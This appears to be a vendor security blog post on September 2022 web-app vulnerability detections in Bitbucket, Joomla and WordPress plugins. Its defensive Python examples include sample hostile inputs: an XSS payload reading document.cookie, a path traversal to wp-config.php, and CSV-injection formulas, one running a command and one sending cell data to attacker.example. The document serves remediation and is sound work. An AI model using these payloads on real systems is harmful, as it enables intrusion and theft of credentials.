September 2022 Web Application Vulnerabilities Released

Ed Arnold

The Qualys WAS team has released a new series of signatures (detections) to report vulnerabilities in three products: Atlassian Bitbucket, Joomla!, and WordPress (plugins). Organizations can immediately audit their web applications for the following vulnerabilities.

Atlassian

QID 150574: Atlassian Bitbucket Server and Data Center – Command Injection Vulnerability (CVE-2022-36804)

Bitbucket is a Git-based source code repository hosting service owned by Atlassian.

In affected versions of Atlassian Bitbucket Server and Data Center, a command injection vulnerability exists in multiple API endpoints. An attacker with access to a public repository, or with read permission on a private repository, can execute arbitrary code on the server by sending a crafted HTTP request. Because only repository read access is required, instances that expose public repositories are reachable by unauthenticated attackers. Note that each release line below has its own fixed version: a host on 7.7.x is not covered by the 7.6.17 fix and must move to 7.17.10 or later on its own line.

Affected versions:
Atlassian Bitbucket Server and Data Center version from 7.0.0 before version 7.6.17
Atlassian Bitbucket Server and Data Center version from 7.7.0 before version 7.17.10
Atlassian Bitbucket Server and Data Center version from 7.18.0 before version 7.21.4
Atlassian Bitbucket Server and Data Center version from 8.0.0 before version 8.0.3
Atlassian Bitbucket Server and Data Center version from 8.1.0 before version 8.1.3
Atlassian Bitbucket Server and Data Center version from 8.2.0 before version 8.2.2
Atlassian Bitbucket Server and Data Center version from 8.3.0 before version 8.3.1
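
The version ranges above are per release line, so a simple "fixed in X or later" comparison gives wrong answers (7.6.17 is fixed, 7.7.0 on the next line is vulnerable again). The following is an added example of a range check over an inventory, written for this page; it is not Qualys's QID logic or Atlassian code. The ranges are copied from the advisory text; the host names and versions in the sample inventory are constructed.

```python
"""Check Bitbucket Server / Data Center version strings against the
CVE-2022-36804 affected ranges listed in the advisory.

Added example, not Qualys or Atlassian code.
"""

import re

# (first affected, first fixed) per release line, copied from the advisory text.
BITBUCKET_CVE_2022_36804_RANGES = [
    ("7.0.0", "7.6.17"),
    ("7.7.0", "7.17.10"),
    ("7.18.0", "7.21.4"),
    ("8.0.0", "8.0.3"),
    ("8.1.0", "8.1.3"),
    ("8.2.0", "8.2.2"),
    ("8.3.0", "8.3.1"),
]


def parse_version(text):
    """Turn '7.6.17' (or '7.21.3-build123') into a comparable tuple of ints.

    A trailing build/qualifier suffix is ignored. Non-numeric input raises
    ValueError so a bad inventory entry is not silently treated as safe.
    """
    m = re.match(r"^\s*(\d+(?:\.\d+)*)", text)
    if not m:
        raise ValueError("not a version string: %r" % text)
    parts = [int(p) for p in m.group(1).split(".")]
    # Pad to three components so '8.0' compares equal to '8.0.0'.
    return tuple(parts + [0] * (3 - len(parts)))


def is_affected(version, ranges=BITBUCKET_CVE_2022_36804_RANGES):
    """True if version falls in any half-open [first_affected, first_fixed) range.

    Half-open intervals matter: the fixed version itself is not affected,
    but the first version of the next release line is.
    """
    v = parse_version(version)
    return any(parse_version(lo) <= v < parse_version(hi) for lo, hi in ranges)


def triage(inventory):
    """Return the subset of {host: version} entries that still need patching."""
    return {host: ver for host, ver in inventory.items() if is_affected(ver)}


if __name__ == "__main__":
    # Constructed sample inventory, not real hosts.
    sample = {
        "bitbucket-prod": "7.21.3",
        "bitbucket-dr": "7.6.17",
        "bitbucket-dev": "8.3.0",
        "bitbucket-legacy": "6.10.0",
    }
    for host, ver in sample.items():
        print(host, ver, "AFFECTED" if is_affected(ver) else "not affected")
```

The same `is_affected` works for the other entries on this page by passing their own (first affected, first fixed) pairs; only the data changes.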

Joomla

QID 154122: Joomla! Core Full Path Disclosures Vulnerability (CVE-2022-27911)

Joomla! is a free and open-source content management system for publishing web content on websites.

The vulnerability exists because the application outputs too much detail while handling error conditions. A remote attacker can trigger such an error and learn sensitive information about the system, such as the full installation path of the web application, which is useful for preparing further attacks (for example, path-based file reads or writes).

Affected Versions:
Joomla 4.2.0

WordPress

WordPress is an open-source content management system (CMS) written in PHP. The following findings concern third-party WordPress plugins.

QID 150566: WordPress WooCommerce PDF Invoices and Packing Slips Plugin: Reflected Cross-Site Scripting Vulnerability (CVE-2022-2537)

WooCommerce PDF Invoice and Packing Slips is a WooCommerce extension plugin that automatically adds a PDF invoice to the order confirmation emails sent out to your customers.

The plugin does not escape the tab and section request parameters before echoing them back into an HTML attribute, leading to reflected cross-site scripting in the admin dashboard. Exploitation requires a logged-in administrator to open an attacker-supplied link, which is the usual reflected XSS phishing scenario.

Affected versions:
WooCommerce PDF Invoice and Packing Slips from 2.14.0 to 3.0.1


QID 150567: WordPress Shareaholic Plugin : Information Disclosure Vulnerability (CVE-2022-0594)

Shareaholic is a WordPress plugin that adds social share buttons, related posts, content analytics, and ad monetization to a website.

Affected versions of the Shareaholic plugin lack a proper authorization check on the "shareaholic_debug_info" AJAX action. In versions prior to 9.7.5 the action is reachable by unauthenticated users; in 9.7.5 it is reachable by authors and higher-privileged users. Calling it returns sensitive information such as the list of active plugins and the PHP, cURL and WordPress versions, which lets an attacker fingerprint the site before choosing further attacks.

Affected versions:
Shareaholic prior to version 9.7.6


QID 150569: WordPress Database Backup Plugin: Stored Cross-Site Scripting Vulnerability (CVE-2022-2271)

The WP Database Backup plugin creates and restores database backups with a single click, either manually or on a schedule.

The plugin does not escape some of its settings on output, which allows high-privilege users such as administrators to perform stored cross-site scripting attacks even when the unfiltered_html capability is disallowed (for example on multisite installations, where site administrators are not permitted to save raw HTML). Because the value is stored, the payload fires for every user who later views the settings page.

Affected versions:
WP Database Backup WordPress plugin before 5.9
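
Both WordPress XSS findings above share one root cause: a value is written into an HTML attribute without attribute-context escaping. The following is an added example written for this page in Python, not the plugins' PHP code; a WordPress plugin would call esc_attr() where html.escape(..., quote=True) is used here. The "tab" link, the settings field name and the payload are constructed for illustration.

```python
"""Attribute-context output escaping, for a reflected request parameter
(the PDF Invoices 'tab' parameter) and a stored setting (a Database Backup
settings field). Added example, not the plugins' code.
"""

import html
import re

# Constructed attacker input: closes the attribute value, then adds an
# event-handler attribute of its own.
BREAKOUT = '" onmouseover="alert(document.cookie)'


def render_tab_link_vulnerable(tab):
    """Echoes the request parameter straight into an attribute (the bug)."""
    return '<a href="?page=settings&tab=%s">%s</a>' % (tab, tab)


def render_tab_link_hardened(tab):
    """Escapes before insertion. quote=True matters: without it the double
    quote that terminates the attribute would pass through untouched."""
    safe = html.escape(tab, quote=True)
    return '<a href="?page=settings&tab=%s">%s</a>' % (safe, safe)


def render_setting_input(name, stored_value, escape=True):
    """A settings form field. stored_value came from the database, so for a
    stored XSS the escaping has to happen here, at output time, regardless of
    who saved the value or whether they hold unfiltered_html."""
    value = html.escape(stored_value, quote=True) if escape else stored_value
    return '<input type="text" name="%s" value="%s">' % (name, value)


def attribute_names(markup):
    """Attribute names a browser would see on the first tag of the markup.
    Shows whether the input smuggled in a new attribute."""
    opening_tag = markup.split(">", 1)[0]
    return re.findall(r'\s([a-zA-Z-]+)="', opening_tag)


if __name__ == "__main__":
    for label, out in (
        ("reflected, vulnerable", render_tab_link_vulnerable(BREAKOUT)),
        ("reflected, hardened", render_tab_link_hardened(BREAKOUT)),
        ("stored, vulnerable", render_setting_input("backup_dir", BREAKOUT, escape=False)),
        ("stored, hardened", render_setting_input("backup_dir", BREAKOUT)),
    ):
        print("%-22s attributes=%s\n  %s" % (label, attribute_names(out), out))
```

The vulnerable outputs gain an `onmouseover` attribute the template never declared; the hardened outputs keep exactly the attributes the template wrote, with the payload rendered as inert text inside the value.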


QID 150570: WordPress BackupBuddy Plugin: Arbitrary File Read Vulnerability (CVE-2022-31474)

The BackupBuddy plugin for WordPress is designed to make back-up management easy for WordPress site owners.

Affected versions of the BackupBuddy plugin do not validate the file path supplied to the "local-download" and "local-destination-id" AJAX actions before reading it and returning its content in the HTTP response. As a result, unauthenticated users can read arbitrary files on the web server, such as /etc/passwd or wp-config.php (which holds the database credentials and the site's authentication salts). Treat any exposed site on an affected version as potentially compromised and rotate those secrets after patching.

Affected versions:
BackupBuddy versions 8.5.8.0 through 8.7.4.1
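
The fix for this class of bug is to confine the requested file to the backup directory after resolving it, not before. The following is an added example written for this page, not BackupBuddy's code; the parameter name, the directory layout and the file contents are constructed, and it uses a temporary directory so it runs offline.

```python
"""Path confinement for a 'download this backup file' handler.
Added example, not BackupBuddy code.
"""

import os
import tempfile


class PathEscape(ValueError):
    """Raised when the requested file resolves outside the allowed root."""


def resolve_download_vulnerable(backup_dir, requested):
    """What an unvalidated handler effectively does: join and read.
    os.path.join discards backup_dir entirely when 'requested' is absolute,
    and '..' segments walk out of it."""
    return os.path.join(backup_dir, requested)


def resolve_download_hardened(backup_dir, requested):
    """Resolve symlinks and '..' first, then require the result to sit under
    the real backup root. A string-prefix check alone is not enough:
    '/srv/backups-old/x' starts with '/srv/backups' but is outside it, so
    compare whole path components with commonpath."""
    root = os.path.realpath(backup_dir)
    candidate = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([root, candidate]) != root:
        raise PathEscape("refusing %r: resolves outside %s" % (requested, root))
    if not os.path.isfile(candidate):
        raise FileNotFoundError(candidate)
    return candidate


def read_backup(backup_dir, requested):
    """Hardened equivalent of the download action: returns bytes or raises."""
    with open(resolve_download_hardened(backup_dir, requested), "rb") as fh:
        return fh.read()


def demo():
    """Constructed layout: a backup root holding one archive, and a
    wp-config.php one level above it. Returns (vulnerable_leaks, outcomes)."""
    base = tempfile.mkdtemp()
    backups = os.path.join(base, "backups")
    os.mkdir(backups)
    with open(os.path.join(backups, "site.zip"), "wb") as fh:
        fh.write(b"PK\x03\x04 constructed archive")
    secret = os.path.join(base, "wp-config.php")
    with open(secret, "w") as fh:
        fh.write("<?php define('DB_PASSWORD', 'constructed');")

    outcomes = {}
    for requested in ("site.zip", "../wp-config.php", secret):
        try:
            outcomes[requested] = read_backup(backups, requested)
        except PathEscape:
            outcomes[requested] = "blocked"

    # The unvalidated join hands back the secret's path for the traversal input.
    leaked = resolve_download_vulnerable(backups, "../wp-config.php")
    vulnerable_leaks = os.path.realpath(leaked) == os.path.realpath(secret)
    return vulnerable_leaks, outcomes


if __name__ == "__main__":
    leaks, results = demo()
    print("unvalidated join reaches wp-config.php:", leaks)
    for requested, result in results.items():
        print("%-40s -> %r" % (requested, result))
```

Both the relative traversal (`../wp-config.php`) and the absolute path are rejected by the hardened resolver, while the legitimate archive under the backup root is still served.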


QID 150573: WordPress Affiliates Manager Plugin: Multiple Vulnerabilities (CVE-2022-2798,CVE-2022-2799)

WP Affiliate Manager is a WordPress plugin that handles affiliate recruitment, registration, login and management.

Affiliate Manager plugin contains multiple vulnerabilities:
CVE-2022-2799: The plugin does not sanitize and escape some of its settings, which could allow high-privilege users to perform cross-site scripting attacks even when the unfiltered_html capability is disallowed.

CVE-2022-2798: The plugin does not validate and sanitize the affiliate data, which could allow users registering as affiliate to perform CSV injection attacks against an admin exporting the data.

Affected Versions:
The WP Affiliate Manager WordPress plugin before 2.9.14
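
CVE-2022-2798 is a CSV (formula) injection: a self-registered affiliate chooses a name that begins with =, +, - or @, and the spreadsheet the administrator opens the export in evaluates that cell as a formula. The following is an added example written for this page, not the plugin's code. The affiliate records are constructed, and the neutralisation (prefixing a single quote so the cell is treated as text) is the commonly used defensive pattern rather than anything the advisory itself describes.

```python
"""CSV injection in an affiliate export: vulnerable and sanitised writers,
plus a re-parse check. Added example, not the plugin's code.
"""

import csv
import io

# Characters that make Excel/LibreOffice treat a cell as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value):
    """Make a cell inert for spreadsheet import by prefixing a single quote
    when the cell (ignoring leading spaces) starts with a trigger character.
    The quote is shown as text in most spreadsheets but stops evaluation."""
    text = str(value)
    if text.lstrip(" ").startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_affiliates(records, sanitize=True):
    """Write affiliate rows to CSV text. sanitize=False reproduces the
    vulnerable export that passes attacker-chosen names straight through."""
    out = io.StringIO()
    writer = csv.writer(out, lineterminator="\n")
    writer.writerow(["id", "name", "website", "payout_email"])
    for rec in records:
        row = [rec["id"], rec["name"], rec["website"], rec["payout_email"]]
        if sanitize:
            row = [neutralize_cell(cell) for cell in row]
        writer.writerow(row)
    return out.getvalue()


def dangerous_cells(csv_text):
    """Re-parse an export and list cells a spreadsheet would evaluate."""
    reader = csv.reader(io.StringIO(csv_text))
    next(reader)  # skip header
    return [cell for row in reader for cell in row
            if cell.lstrip(" ").startswith(FORMULA_TRIGGERS)]


# Constructed sample: one honest affiliate, one carrying a DDE-style payload
# in the name, and one using the '+' and '@' triggers.
SAMPLE = [
    {"id": 1, "name": "Ada Lovelace", "website": "https://example.com",
     "payout_email": "ada@example.com"},
    {"id": 2, "name": '=cmd|" /C calc"!A0', "website": "https://attacker.example",
     "payout_email": "x@attacker.example"},
    {"id": 3, "name": '+HYPERLINK("https://attacker.example/?"&A1,"click")',
     "website": "@SUM(1+1)", "payout_email": "y@attacker.example"},
]


if __name__ == "__main__":
    vulnerable = export_affiliates(SAMPLE, sanitize=False)
    print("vulnerable export, formula cells:", dangerous_cells(vulnerable))
    sanitised = export_affiliates(SAMPLE)
    print("sanitised export, formula cells:", dangerous_cells(sanitised))
    print(sanitised)
```

The trade-off to be aware of: the "-" trigger also prefixes legitimate negative numbers, so if the export carries numeric columns that must stay numeric, apply `neutralize_cell` only to free-text fields such as names and URLs.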
